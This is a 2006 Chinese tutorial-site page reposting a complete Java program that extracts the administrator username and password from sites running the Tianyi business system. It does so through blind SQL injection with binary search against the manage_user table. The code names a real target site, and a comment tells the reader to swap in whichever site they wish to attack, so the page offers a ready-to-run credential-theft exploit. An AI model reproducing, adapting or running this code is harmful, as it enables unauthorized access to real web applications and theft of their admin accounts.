您现在的位置: 无忧电子商务网 >> 信息学院 >> 程序开发 >> js >> 正文

java程序破解天意商务系统后台帐号

作者:作者:未…    信息学院来源:网络收集    点击数:    更新时间:2006-8-27 我要参与讨论

  java程序破解天意商务系统后台帐号


/**
文件名 : AttackTY.java
描述 : 针对天意商务系统的java程序,破解后台管理员用户名和密码,利用SQL Injection漏洞
注入地址为本网动态的某个新闻,这里以www.ejl.cn为例
作者: 慈勤强
Email : cqq1978@Gmail.com
**/


import java.net.*;
import java.io.*;

public class AttackTY extends Thread
{
int iUserLen;
int iPwdLen;
String strKey="暂时还未";
String strU="http://www.ejl.cn/show_news.asp?newsid=105"; //只须修改这里,变成你要攻击的网站地址

//取得某个页面的函数
public String getContent(String strUrl)
{
try{
URL url=new URL(strUrl);
BufferedReader br=new BufferedReader(new InputStreamReader(url.openStream()));
String s="";
StringBuffer sb=new StringBuffer("");
while((s=br.readLine())!=null)
{
sb.append(s+"\r\n");
}
br.close();
return sb.toString();
}
catch(Exception e){
return "error open url" + strUrl;

}
}


//取得管理员用户名和密码的长度
private int getLen(String str)
{
AttackTY ou=new AttackTY();
String s,s1;
for(int i=2;i<20;i++)
{
s=strU+"%20and%20(select%20top%201%20len("+str+")%20from%20manage_user)="+i;
s1=ou.getContent(s);
if(s1.indexOf(strKey)<0)
{
return i;
}
}
return 0;
}


//二分法取得用户名和密码的Ascii码值
private void getValue(String str,int iLen)
{
AttackTY ou=new AttackTY();
String s,s1,s2;
s2="";
int iStart,iEnd,iNow;
for(int j=1;j<=iLen;j++)
{
iStart=33;
iEnd=126;
while(iEnd-iStart>1)
{
iNow=(iStart+iEnd)/2;
s=strU+"%20and%20(select%20top%201%20asc(mid("+str+","+j+",1))%20from%20manage_user)>"+iNow;
s1=ou.getContent(s);
if(s1.indexOf(strKey)<0)
{
iStart = iNow;
}
else
{
iEnd = iNow;
}
}

System.out.print((char)iEnd);
}
}


public static void main(String args[])
{
AttackTY ou=new AttackTY();
ou.iUserLen=ou.getLen("username");
ou.iPwdLen=ou.getLen("password");
System.out.println("用户名:" );
ou.getValue("username",ou.iUserLen);
System.out.println("\r\n密码:");
ou.getValue("password",ou.iPwdLen);
}
}



在google里搜索更多java程序破解天意商务系统后台帐号

Google
Web www.51ec.org
  • 上一篇信息学院:

  • 下一篇信息学院:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    我来说两句 对此文章发表了评论
      昵 称: *必填    ·注册用户·
      评 分: 1分 2分 3分 4分 5分     严禁发表危害国家安全、政治、黄色淫秽等内容的评论,用户需对自己在使用本网站服务过程中的行为承担法律责任。本站管理员有权保留或删除评论内容,评论内容只代表机友个人观点,与本网站立场无关。  
    评 论
    内 容
     
    评论列表 (最新 评论仅限网友观点!)
    推荐文章
  • 此栏目下没有推荐信息学院

    • 供求信息


    | 设为首页 | 加入收藏 | 关于我们 | 广告服务 | 联系方式 | 友情链接 | 版权申明

    Copyrights 2005-2006 www.51ec.Org All Rights Reserved. 无忧电子商务网 版权所有
    Email:lijize@126.com QQ:139178413 QQ群:9329650 在线交谈
    声明:本站部分资料来源于网络及网友提供,本站不保证其真实有效。如侵犯你的权益请与我们联系
    中国互联网信息产业部ICP备案号:沪ICP备06014039号